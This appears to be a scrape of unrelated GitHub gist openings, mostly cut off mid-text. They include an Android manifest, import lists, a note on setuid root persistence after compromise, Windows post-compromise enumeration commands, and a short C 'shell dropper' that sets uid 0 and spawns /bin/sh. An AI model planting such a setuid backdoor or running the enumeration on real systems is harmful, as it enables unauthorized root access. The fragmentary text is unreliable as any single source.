solarsailer

--- Manifest ---
<activity android:name=".URLScheme">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data 
            android:scheme="http" 
            android:host="www.a_url.com" 
            android:pathPrefix="/a_path" />

taviso

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include <iconv.h>
#include <string.h>
#include <assert.h>

// Quick utility to generate Process Monitor filter sets for testing.
// Tavis Ormandy <[email protected]>

dergachev

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).

If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur

sckalath

// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

cryptix

package main

import (
	"errors"
	"log"
	"os"

	"github.com/PuerkitoBio/goquery"
	"github.com/robertkrimen/otto"
)

darkwave

/*
 For more information visit Android developer portal http://developer.android.com/training/sharing/receive.html
*/

import android.graphics.BitmapFactory;
import android.graphics.Bitmap;
import java.io.InputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import android.content.Intent;

stevenswafford

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

greim

import https from 'https'
import http from 'http'
import url from 'url'
import adapt from 'ugly-adapter' // callback => promise adapter; need to npm install this
import tls from 'tls'
import net from 'net'
import fs from 'fs'
import os from 'os'
import path from 'path'
import childProcess from 'child_process'

PythEch

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    setuid(0); 
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
}

shreddd

#!/usr/bin/env python
"""
Simple HTTP URL redirector
Shreyas Cholia 10/01/2015

usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url

HTTP redirect server

positional arguments: